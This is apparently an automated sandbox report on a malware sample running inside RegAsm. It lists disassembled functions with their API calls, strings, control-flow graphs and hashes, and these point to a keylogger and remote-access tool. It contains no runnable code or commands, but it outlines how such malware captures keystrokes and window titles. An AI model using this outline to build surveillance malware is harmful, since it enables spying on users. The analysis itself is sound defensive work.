                    control_flow_graph 1051 4048c8-4048e8 connect 1052 404a1b-404a1f 1051->1052 1053 4048ee-4048f1 1051->1053 1056 404a21-404a2f WSAGetLastError 1052->1056 1057 404a97 1052->1057 1054 404a17-404a19 1053->1054 1055 4048f7-4048fa 1053->1055 1058 404a99-404a9e 1054->1058 1059 404926-404930 call 420c60 1055->1059 1060 4048fc-404923 call 40531e call 402093 call 41b4ef 1055->1060 1056->1057 1061 404a31-404a34 1056->1061 1057->1058 1070 404941-40494e call 420e8f 1059->1070 1071 404932-40493c 1059->1071 1060->1059 1063 404a71-404a76 1061->1063 1064 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1061->1064 1067 404a7b-404a94 call 402093 * 2 call 41b4ef 1063->1067 1064->1057 1067->1057 1083 404950-404973 call 402093 * 2 call 41b4ef 1070->1083 1084 404987-404992 call 421a40 1070->1084 1071->1067 1113 404976-404982 call 420ca0 1083->1113 1096 4049c4-4049d1 call 420e06 1084->1096 1097 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1084->1097 1110 4049d3-4049f6 call 402093 * 2 call 41b4ef 1096->1110 1111 4049f9-404a14 CreateEventW * 2 1096->1111 1097->1113 1110->1111 1111->1054 1113->1057
                    APIs
                    • connect.WS2_32(?,?,?), ref: 004048E0
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                    • WSAGetLastError.WS2_32 ref: 00404A21
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                    • API String ID: 994465650-2151626615
                    • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                    • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                    Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                    • GetForegroundWindow.USER32 ref: 0040AD49
                    • GetWindowTextLengthW.USER32 ref: 0040AD52
                    • GetWindowTextW.USER32 ref: 0040AD86
                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                    • String ID: [${ User has been idle for $ minutes }$]
                    • API String ID: 911427763-3954389425
                    • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                    • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                    • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                    • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                    Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1206 40da34-40da59 call 401f86 1209 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1206->1209 1210 40da5f 1206->1210 1231 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1209->1231 1212 40da70-40da7e call 41b5b4 call 401f13 1210->1212 1213 40da91-40da96 1210->1213 1214 40db51-40db56 1210->1214 1215 40daa5-40daac call 41bfb7 1210->1215 1216 40da66-40da6b 1210->1216 1217 40db58-40db5d 1210->1217 1218 40da9b-40daa0 1210->1218 1219 40db6e 1210->1219 1220 40db5f-40db6c call 43c0cf 1210->1220 1240 40da83 1212->1240 1222 40db73 call 43c0cf 1213->1222 1214->1222 1232 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1215->1232 1233 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1215->1233 1216->1222 1217->1222 1218->1222 1219->1222 1220->1219 1234 40db79-40db7e call 409057 1220->1234 1235 40db78 1222->1235 1232->1240 1245 40da87-40da8c call 401f09 1233->1245 1234->1209 1235->1234 1240->1245 1245->1209
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: LongNamePath
                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                    • API String ID: 82841172-425784914
                    • Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                    • Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                    Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1305 44ac49-44ac62 1306 44ac64-44ac74 call 446766 1305->1306 1307 44ac78-44ac7d 1305->1307 1306->1307 1314 44ac76 1306->1314 1309 44ac7f-44ac87 1307->1309 1310 44ac8a-44acae MultiByteToWideChar 1307->1310 1309->1310 1312 44acb4-44acc0 1310->1312 1313 44ae41-44ae54 call 434fcb 1310->1313 1315 44ad14 1312->1315 1316 44acc2-44acd3 1312->1316 1314->1307 1318 44ad16-44ad18 1315->1318 1319 44acd5-44ace4 call 457190 1316->1319 1320 44acf2-44ad03 call 446137 1316->1320 1323 44ae36 1318->1323 1324 44ad1e-44ad31 MultiByteToWideChar 1318->1324 1319->1323 1333 44acea-44acf0 1319->1333 1320->1323 1330 44ad09 1320->1330 1328 44ae38-44ae3f call 435e40 1323->1328 1324->1323 1327 44ad37-44ad49 call 448bb3 1324->1327 1335 44ad4e-44ad52 1327->1335 1328->1313 1334 44ad0f-44ad12 1330->1334 1333->1334 1334->1318 1335->1323 1337 44ad58-44ad5f 1335->1337 1338 44ad61-44ad66 1337->1338 1339 44ad99-44ada5 1337->1339 1338->1328 1342 44ad6c-44ad6e 1338->1342 1340 44ada7-44adb8 1339->1340 1341 44adf1 1339->1341 1343 44add3-44ade4 call 446137 1340->1343 1344 44adba-44adc9 call 457190 1340->1344 1345 44adf3-44adf5 1341->1345 1342->1323 1346 44ad74-44ad8e call 448bb3 1342->1346 1350 44ae2f-44ae35 call 435e40 1343->1350 1361 44ade6 1343->1361 1344->1350 1359 44adcb-44add1 1344->1359 1349 44adf7-44ae10 call 448bb3 1345->1349 1345->1350 1346->1328 1358 44ad94 1346->1358 1349->1350 1362 44ae12-44ae19 1349->1362 1350->1323 1358->1323 1363 44adec-44adef 1359->1363 1361->1363 1364 44ae55-44ae5b 1362->1364 1365 44ae1b-44ae1c 1362->1365 1363->1345 1366 44ae1d-44ae2d WideCharToMultiByte 1364->1366 1365->1366 1366->1350 1367 44ae5d-44ae64 call 435e40 1366->1367 1367->1328
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                    • __freea.LIBCMT ref: 0044AE30
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • __freea.LIBCMT ref: 0044AE39
                    • __freea.LIBCMT ref: 0044AE5E
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 3864826663-0
                    • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                    • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                    Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1388 41c3f1-41c402 1389 41c404-41c407 1388->1389 1390 41c41a-41c421 1388->1390 1391 41c410-41c418 1389->1391 1392 41c409-41c40e 1389->1392 1393 41c422-41c43b CreateFileW 1390->1393 1391->1393 1392->1393 1394 41c441-41c446 1393->1394 1395 41c43d-41c43f 1393->1395 1397 41c461-41c472 WriteFile 1394->1397 1398 41c448-41c456 SetFilePointer 1394->1398 1396 41c47f-41c484 1395->1396 1400 41c474 1397->1400 1401 41c476-41c47d CloseHandle 1397->1401 1398->1397 1399 41c458-41c45f CloseHandle 1398->1399 1399->1395 1400->1401 1401->1396
                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                    • CloseHandle.KERNEL32(00000000), ref: 0041C459
                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                    • CloseHandle.KERNEL32(00000000), ref: 0041C477
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreatePointerWrite
                    • String ID: hpF
                    • API String ID: 1852769593-151379673
                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                    Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1402 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1413 41b35d-41b366 1402->1413 1414 41b31c-41b347 call 4135a6 call 401fab StrToIntA 1402->1414 1416 41b368-41b36d 1413->1416 1417 41b36f 1413->1417 1424 41b355-41b358 call 401fd8 1414->1424 1425 41b349-41b352 call 41cf69 1414->1425 1418 41b374-41b37f call 40537d 1416->1418 1417->1418 1424->1413 1425->1424
                    APIs
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                    • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue
                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    • API String ID: 1866151309-2070987746
                    • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                    • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                    Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1476 40a675-40a685 1477 40a722-40a725 1476->1477 1478 40a68b-40a68d 1476->1478 1479 40a690-40a6b6 call 401f04 CreateFileW 1478->1479 1482 40a6f6 1479->1482 1483 40a6b8-40a6c6 GetFileSize 1479->1483 1486 40a6f9-40a6fd 1482->1486 1484 40a6c8 1483->1484 1485 40a6ed-40a6f4 CloseHandle 1483->1485 1487 40a6d2-40a6d9 1484->1487 1488 40a6ca-40a6d0 1484->1488 1485->1486 1486->1479 1489 40a6ff-40a702 1486->1489 1490 40a6e2-40a6e7 Sleep 1487->1490 1491 40a6db-40a6dd call 40b0dc 1487->1491 1488->1485 1488->1487 1489->1477 1492 40a704-40a70b 1489->1492 1490->1485 1491->1490 1492->1477 1493 40a70d-40a71d call 40905c call 40a179 1492->1493 1493->1477
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                    • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSizeSleep
                    • String ID: XQG
                    • API String ID: 1958988193-3606453820
                    • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                    • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                    Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventTick
                    • String ID: !D@$NG
                    • API String ID: 180926312-2721294649
                    • Opcode ID: ebd61020a37b9220784ff29151858ac03b19ee77db9fcefbed30365d3bd7595e
                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                    • Opcode Fuzzy Hash: ebd61020a37b9220784ff29151858ac03b19ee77db9fcefbed30365d3bd7595e
                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                    Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTimewsprintf
                    • String ID: Offline Keylogger Started
                    • API String ID: 465354869-4114347211
                    • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                    • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                    Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                    • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$EventLocalThreadTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 2532271599-1507639952
                    • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                    • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                    • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                    • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                    Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                    • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                    • RegCloseKey.KERNEL32(?), ref: 004137B1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: pth_unenc
                    • API String ID: 1818849710-4028850238
                    • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                    • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                    Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3360349984-0
                    • Opcode ID: 86f3e289ee87dd2070e95c4c7186b2520882cd19ee190badebe9b582a3aec49f
                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                    • Opcode Fuzzy Hash: 86f3e289ee87dd2070e95c4c7186b2520882cd19ee190badebe9b582a3aec49f
                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                    Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                    • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                    Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                    • GetLastError.KERNEL32 ref: 0040D083
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastMutex
                    • String ID: SG
                    • API String ID: 1925916568-3189917014
                    • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                    • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                    Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                    • RegQueryValueExA.KERNEL32 ref: 004135E7
                    • RegCloseKey.KERNEL32(?), ref: 004135F2
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                    • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                    • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                    • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                    Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                    • RegQueryValueExA.KERNEL32 ref: 0041372D
                    • RegCloseKey.KERNEL32(00000000), ref: 00413738
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                    • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                    • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                    • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                    Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                    • RegQueryValueExA.KERNEL32 ref: 00413587
                    • RegCloseKey.KERNEL32(?), ref: 00413592
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                    • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                    • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                    • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                    Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
